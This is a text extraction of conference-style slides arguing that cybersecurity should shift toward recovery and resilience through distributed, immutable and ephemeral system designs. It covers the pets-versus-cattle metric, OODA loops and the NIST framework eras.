  • 8. JOIN THE PREVENTION AGE STOP CYBER BREACHES Forging ahead or regressing back? @sounilyu 8 • A call to go back to the 1990s? • How will prevention mitigate the impact of ransomware? - Remember, we learned “assume breach” in the 2010s - Prevention minimizes the occurrences, but does not address the impact or ability to recoverJOIN THE PREVENTION AGE STOP CYBER BREACHES
  • 9. 2020s: Age of Recovery (or Resiliency) @sounilyu 9 What kind of solutions directly support our ability to RECOVER or be RESILIENT? Copy on Write Computer Hypervisor OS Apps Apps Apps Libraries SERVERLESS ARCHITECTURE Content Delivery Network
  • 10. But wait! How are these “security” solutions? 10 Distributed Immutable Ephemeral DDoS Resistant The best solution against a distributed attack is a distributed service Changes Easier to Detect and Reverse Unauthorized changes stand out and can be reverted to known good Drives Value of Assets Closer to Zero Makes attacker persistence hard and reduces concern for assets at risk Availability Integrity Confidentiality @sounilyu
  • 11. The Alternative: An Endless Conveyor Belt of Vulnerabilities and Threats @sounilyu 11 Risk Never Ending Threats Never Ending Vulns Likelihood Impact= x
  • 12. Pets vs Cattle @sounilyu 12 • Given a familiar name • Taken to the vet when sick • Hugged • Branded with an obscure, unpronounceable name • Shot when sick • Eaten/Recycled (sorry PETA)
  • 13. A New Measurement for a New Era: Pets vs Cattle Curve @sounilyu 13 10000 0 5000 10000 15000 20000 1000 100 10 1 @40 Days  Pets = 2.5% @10 Days  Pets = 10% Target: @ 10 Days  Pets = 2.5% Fewer pets Find design patterns, policies, and incentives that push the curve in these directions Shorter- lived cattle Uptime(inDays) SystemsPets Cattle 2000systems 10 days 500systems 40 days
  • 14. A Better Way to Get Inside the Attacker OODA Loop? @sounilyu 14 Orient DecideAct Observe Defender OODA Loop Attacker OODA Loop Observe OrientDecide Act Act ObserveOrient Decide Natural Business OODA Loop Business OODA Loop w/Traditional Security Restrictions Distributed, immutable, and ephemeral design patterns allow businesses to move faster and naturally shorten the OODA loop (OODABusiness – OODACIO+CISO = Shadow IT) Larger swaths of risk are quickly being eliminated at newer companies, at earlier and earlier stages. And usually not because security was the goal. – Ryan McGeehan https://medium.com/starting-up-security/you-dont-need-a-chief-security-officer-3f8d1a76b924
  • 15. None Hobby Shop / Vulnerability Mgt Dedicated Biz Unit / Risk Mgt Sec Ops Center / Threat Mgt Completing the NIST Cyber Security Framework @sounilyu 15 Asset Inventory, Asset Mgt, Asset Prioritization Viruses, Insecure Configs, Server- side Attacks Client-side Attacks, Log Analysis and Mgt Assume Breach, Too Many Privileges STABILITY (CIO) Systems Mgt Tools, Scanners A/V, Firewalls, Secure Configs, App Sec IDS, SIEM Incident Response, Hunting, EDR, IdAM SECURITY (CISO) 1980 Identify 1990 Protect 2000 Detect 2010 Respond 2020 Recover Ransomware, MBR Wiper, DDoS, Firmware Bricking Distributed, Immutable, Ephemeral (DIE!!!) Systems Integrated Team / Rugged DevOps Core Challenges Solutions IT / Security Tension Era Security Team Composition & Focus
  • 16. • Known attack methods only get better with time against static systems • The next era in IT and Security will manifest more irreversible attacks that challenge and undermine our ability to RECOVER • Better PROTECT, DETECT, and RESPOND capabilities may reduce occurrences of malicious events but are insufficient against well- executed destructive/irreversible scenarios • Our best countermeasure is resilient design patterns that promote the qualities of distributed, immutable, and ephemeral (DIE!) in lieu of confidentiality, integrity, and availability Summary @sounilyu 16
  • 17. • Elimination of poor designs will happen either by intentional decommissioning or by destruction. Which would you rather count on? Solving Cybersecurity Through Cyber Train Crashes @sounilyu 17